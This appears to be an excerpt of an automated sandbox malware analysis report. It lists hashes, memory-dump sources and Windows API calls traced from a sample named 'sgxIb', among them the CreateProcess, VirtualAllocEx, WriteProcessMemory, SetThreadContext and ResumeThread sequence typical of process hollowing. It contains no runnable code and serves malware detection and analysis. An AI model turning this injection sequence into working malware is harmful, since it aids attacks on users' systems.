                                                                                                            • Instruction ID: 849db1ef61da00fab9ec1db0b4e51f4e7405f18102e6beec68c763cd711d23b5
                                                                                                            • Opcode Fuzzy Hash: 88291cf300ddbf54fccb40f0bf3d6e9fd9dd8149532defeb1bc2444d3e13a151
                                                                                                            • Instruction Fuzzy Hash: F5F08C35B002188FDB00DBA9D840BEEBBF1FF88322F148565E619E72D0C63499118BA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 776a0743031e28800a5e15bd1613f8b33ae390534ca5fd8eadbdd35b0a600e0f
                                                                                                            • Instruction ID: e860b727e27f5e7985ccc48e5cbc880d1c67d75ca7e4ceeab1e322357c4b7a82
                                                                                                            • Opcode Fuzzy Hash: 776a0743031e28800a5e15bd1613f8b33ae390534ca5fd8eadbdd35b0a600e0f
                                                                                                            • Instruction Fuzzy Hash: B2F082323002196B8B05AF98AC449AF7FABEBC8260B008429FE09D3350DB319E1597B5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1896972984.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6840000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dd9e3912f9540e1df8d850dc4f3598dda6f98abde82960b4f41d8353d579efd9
                                                                                                            • Instruction ID: d4bda02d3ca6fd9886498bf0877aa99ebc9173f97255fc7264c80035c50754c1
                                                                                                            • Opcode Fuzzy Hash: dd9e3912f9540e1df8d850dc4f3598dda6f98abde82960b4f41d8353d579efd9
                                                                                                            • Instruction Fuzzy Hash: E7E01271E102199F8B90EB79590169FBBF8AB45250F004475DA09E3200E670C60087D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.1897075527.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:9.2%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:163
                                                                                                            Total number of Limit Nodes:9

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E936FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E936FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0

                                                                                                            Control-flow Graph (image not recovered; first node c5c038, calls GetModuleHandleW)
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885296749.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c50000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:

                                                                                                            Control-flow Graph (image not recovered; first node c55905, calls CreateActCtxA)
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00C559C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885296749.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c50000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0

                                                                                                            Control-flow Graph (image not recovered; first node c544e4, calls CreateActCtxA)
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00C559C1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885296749.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c50000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0

                                                                                                            Control-flow Graph (image not recovered; first node 6e93238, calls WriteProcessMemory)
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E932D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0

                                                                                                            Control-flow Graph (image not recovered; first node 6e93240, calls WriteProcessMemory)
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E932D0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0

                                                                                                            Control-flow Graph (image not recovered; first node 6e93328, calls ReadProcessMemory)
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E933B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0

                                                                                                            Control-flow Graph (image not recovered; first node 6e930a1, calls Wow64SetThreadContext)
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E93126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0

                                                                                                            Control-flow Graph (image not recovered; first node c5cdd0, calls DuplicateHandle)
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C5E8F6,?,?,?,?,?), ref: 00C5E9B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885296749.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c50000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E933B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0

                                                                                                            Control-flow Graph (image not recovered; first node 6e930a8, calls Wow64SetThreadContext)
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E93126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E931EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E931EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 34293327bee44d34c614d0b39119a60571c329d0eabe815e8b33a0ab77721304
                                                                                                            • Instruction ID: 9adfb5710c9866ac755cee8bdf2deb48fd75107e8ddb2260345fc47034aa21b9
                                                                                                            • Opcode Fuzzy Hash: 34293327bee44d34c614d0b39119a60571c329d0eabe815e8b33a0ab77721304
                                                                                                            • Instruction Fuzzy Hash: 7E1126B19003499FCB10DFAAC845ADFBFF5EF88324F108419E519A7250CB75A954CFA5
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: 70a84678d69cd1d38aff39506836b9852278996f97ee84d80a8ca2759ac8cc33
                                                                                                            • Instruction ID: 9264d3cbe120bdc67e929c854223092cd63dfbdf335d9117af761e292f4a9cab
                                                                                                            • Opcode Fuzzy Hash: 70a84678d69cd1d38aff39506836b9852278996f97ee84d80a8ca2759ac8cc33
                                                                                                            • Instruction Fuzzy Hash: C21143B1D003088BCB20DFAAD8457DEFBF5EF88324F20841AD519A7240DA79A944CFA4
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ResumeThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 947044025-0
                                                                                                            • Opcode ID: 2933d999ff7d14eb36de19e6c518c3d7c908d9a108275c759241a2e7fa4b6542
                                                                                                            • Instruction ID: c0d46f18f416f0b0f627ab0948fa21c7175912e785527c11635517e3a72d2b47
                                                                                                            • Opcode Fuzzy Hash: 2933d999ff7d14eb36de19e6c518c3d7c908d9a108275c759241a2e7fa4b6542
                                                                                                            • Instruction Fuzzy Hash: 351125B1D003488BCB20DFAAC84579EFBF5EF88324F208419D519A7240DA75A944CBA5
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00C5C29E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885296749.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c50000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: e61eb863b0b5dcfd714a178973c2674734cfbd8bfa147fb517178cd8ec63580f
                                                                                                            • Instruction ID: 7c554c8358996701aa6c9874ad50dfbc8fee466f41d021ea705acafd549e869b
                                                                                                            • Opcode Fuzzy Hash: e61eb863b0b5dcfd714a178973c2674734cfbd8bfa147fb517178cd8ec63580f
                                                                                                            • Instruction Fuzzy Hash: D311E0B5C003498FCB10DF9AD884ADEFBF5EB88324F10841AD829A7210D775A649CFA5
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 06E9574D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 216ee2b6c47839960efb5bb3f356cb4e5290d234d4d7c272484cad5d0e8a6c3d
                                                                                                            • Instruction ID: 77af9a3390bae97373e0c76c6a0c998d257d51469e729c73b96c21c9632113fd
                                                                                                            • Opcode Fuzzy Hash: 216ee2b6c47839960efb5bb3f356cb4e5290d234d4d7c272484cad5d0e8a6c3d
                                                                                                            • Instruction Fuzzy Hash: DE11C2B58003499FDB10DF9AD989BDEBFF8EB48320F14841AE519A7340C375A644CFA5
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 06E9574D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 83f9aa36a6def6f121e2220a387914e0eb1e0d686afc93681f8d731a97917f34
                                                                                                            • Instruction ID: 8e38ad5641613281b151f82db716fad5829e0ffd2377a8d5053601a670369431
                                                                                                            • Opcode Fuzzy Hash: 83f9aa36a6def6f121e2220a387914e0eb1e0d686afc93681f8d731a97917f34
                                                                                                            • Instruction Fuzzy Hash: 6011D3B5800349DFDB10DF9AD985BDEBBF8EB48320F10841AD519A7340C375A644CFA5
                                                                                                            APIs
                                                                                                            • PostMessageW.USER32(?,?,?,?), ref: 06E9574D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1910735219.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_6e90000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 410705778-0
                                                                                                            • Opcode ID: 56d3060214a275b5003ad634dc7f43f4d9a76129d86a61781997563a084feced
                                                                                                            • Instruction ID: 5cc7329b2aaa39105831f2f21e5907c0249f738a5f58b1ccb2915f13e9fcb566
                                                                                                            • Opcode Fuzzy Hash: 56d3060214a275b5003ad634dc7f43f4d9a76129d86a61781997563a084feced
                                                                                                            • Instruction Fuzzy Hash: A4E03972804348CEDB12AF99E4493DAFFF0AF55224F24C44AC159A3291C2781298CBA2
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00C5FF88
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885296749.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c50000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 28318b47b6cc7088a7b3d4dba6927b23517e34c8870f3fa8e9d2295ead8fe0a7
                                                                                                            • Instruction ID: c1836511a0067afd2c4703538720d08168db8793d239ff4cb30b6c37e4db50a7
                                                                                                            • Opcode Fuzzy Hash: 28318b47b6cc7088a7b3d4dba6927b23517e34c8870f3fa8e9d2295ead8fe0a7
                                                                                                            • Instruction Fuzzy Hash: B31115B58003498FCB10DF9AC545BDEBBF5EB48320F10842AD969A7741D778AA84CFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885090383.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_bfd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6b61a74bf5a45a77fa19fb9226582575187517ee44a31be370920160372bcac8
                                                                                                            • Instruction ID: 5db854e195daf5c09e4efe3b8008acf9541acc25b300a1109cbc729d276c1a77
                                                                                                            • Opcode Fuzzy Hash: 6b61a74bf5a45a77fa19fb9226582575187517ee44a31be370920160372bcac8
                                                                                                            • Instruction Fuzzy Hash: EF2128B1504208DFDB05DF14D9C0B36BFA6FBA4328F24C5A9DA0A0B356C336D81AD7A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885149118.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c0d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d68b390c8eb4428557f745999f197565b04abc33d68fc03f2e7cca3b1bc92447
                                                                                                            • Instruction ID: 72b034c6ecebb74ff4bad8fe802c856cf309e46c0b8a2af203d805d1901d6c3f
                                                                                                            • Opcode Fuzzy Hash: d68b390c8eb4428557f745999f197565b04abc33d68fc03f2e7cca3b1bc92447
                                                                                                            • Instruction Fuzzy Hash: 2121F2B1604300EFDB05DF94D9C4B26BBA5FB94314F24CAADE90B4B292C336DC56CA61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885149118.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c0d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 01442f0c8432fbaadf7845d38beaa40781c34825f5f75124e230a1c28ea51810
                                                                                                            • Instruction ID: c2d58b4e4da36146d6803ec10b5069bec60fba97db8b98d23f9c806e5c7d86d9
                                                                                                            • Opcode Fuzzy Hash: 01442f0c8432fbaadf7845d38beaa40781c34825f5f75124e230a1c28ea51810
                                                                                                            • Instruction Fuzzy Hash: 2521D375604200DFDB14DF54D9C4B16BBA5EB94318F24C569D80F4B286C336D807CA61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885149118.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c0d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 58ea92a844ccab269c03f46e8cfc128d8b37068d3d80743c405986ea5ec7f6a4
                                                                                                            • Instruction ID: a429ef6ea374975c7803b30aac83f3b681cf2a0539ee91fba79f8753a49ab2b4
                                                                                                            • Opcode Fuzzy Hash: 58ea92a844ccab269c03f46e8cfc128d8b37068d3d80743c405986ea5ec7f6a4
                                                                                                            • Instruction Fuzzy Hash: 0F2192755093C08FCB02CF24D994715BF71EB46314F28C5EAD84A8F6A7C33A980ACB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885090383.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_bfd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                            • Instruction ID: cd6aa290108190084074da27c940c488e2629965589cb24786bdf80f2eb4c565
                                                                                                            • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                            • Instruction Fuzzy Hash: 2211D676504244CFDB16CF14D5C4B26BFB2FB94324F24C5A9D9050B256C336D85ACB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885149118.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_c0d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction ID: ed1862ff1d54f15173c9f0d5364789576724f3948bbade34557fc39d4ad34235
                                                                                                            • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction Fuzzy Hash: BB11DD75904280DFCB02CF54C5C4B15FBB2FB84324F24C6ADD84A4B696C33AD94ACB61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885090383.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_bfd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f5052b7e88a4f9599d46465dca8d96fe511dbde8743b847ac25bfc3175a59d37
                                                                                                            • Instruction ID: 3606d4350cff4529c90b3476910bfb14f4207e28418be991d5b1591e26a01eb6
                                                                                                            • Opcode Fuzzy Hash: f5052b7e88a4f9599d46465dca8d96fe511dbde8743b847ac25bfc3175a59d37
                                                                                                            • Instruction Fuzzy Hash: 6301D4711083489AE7106B15DCC4B36FFD9DF51321F18C99AEE090F286C6299C44CB71
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1885090383.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_bfd000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 041c681bfce35cdaa4498f576d7f2deb577e893b03fffd9d42e291ba4147dd01
                                                                                                            • Instruction ID: 4e14550925701cfb1439acdcc47b3db629a2275b1e1c67272f1c14e6bcb0b8d0
                                                                                                            • Opcode Fuzzy Hash: 041c681bfce35cdaa4498f576d7f2deb577e893b03fffd9d42e291ba4147dd01
                                                                                                            • Instruction Fuzzy Hash: A4F0AF310043449AE7209B06DC84B62FFE8EB50724F18C59AED080F28AC279AC44CBA0

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:11.6%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:17
                                                                                                            Total number of Limit Nodes:4

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: 4572da186588188c901997ccb134116c9da05b407c98703c59ffdd57c79f5b82
                                                                                                            • Instruction ID: 67656600ec76d6e1bed6693ba8121afdda0310120f396444a3fcdd44d4766ea4
                                                                                                            • Opcode Fuzzy Hash: 4572da186588188c901997ccb134116c9da05b407c98703c59ffdd57c79f5b82
                                                                                                            • Instruction Fuzzy Hash: E1324031E1071A8FCB14EF75D8546ADB7B6FF89300F5186A9D40AAB254EF30AD85CB81

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: eece72e5f807df38cf676b7127ce4f0db813a13c27f1c7d807ab16e79d8ee753
                                                                                                            • Instruction ID: 4f020e323c9291020e0de28bebd9b37a0a621c9e093f7bde94cd7cbd044c5a46
                                                                                                            • Opcode Fuzzy Hash: eece72e5f807df38cf676b7127ce4f0db813a13c27f1c7d807ab16e79d8ee753
                                                                                                            • Instruction Fuzzy Hash: 9D029F70B002258FDB54DB78D9546AEB7E2FF84304F15896AE909DB394DB71EC82CB81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dec7a50b3b05f5493ae64176125a7dca5de9b8de5b6ffea74493caedc7286857
                                                                                                            • Instruction ID: 45e48a39074b6fa59a0549e1897f562c9c6fa20e1d165fcc364e4aac27246650
                                                                                                            • Opcode Fuzzy Hash: dec7a50b3b05f5493ae64176125a7dca5de9b8de5b6ffea74493caedc7286857
                                                                                                            • Instruction Fuzzy Hash: AC230A31D10B198ACB11EF68C8946ADF7B1FF99300F15D79AE458B7221EB70AAC5CB41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: da57bf2f26ef94a64ab8bbbc13ea2c89e7e7ef43131b66e40599a70d34997d16
                                                                                                            • Instruction ID: 90fe188cff548005182223b0b37b2ef2a76ad75278c04c12d4fb34ab5c573c81
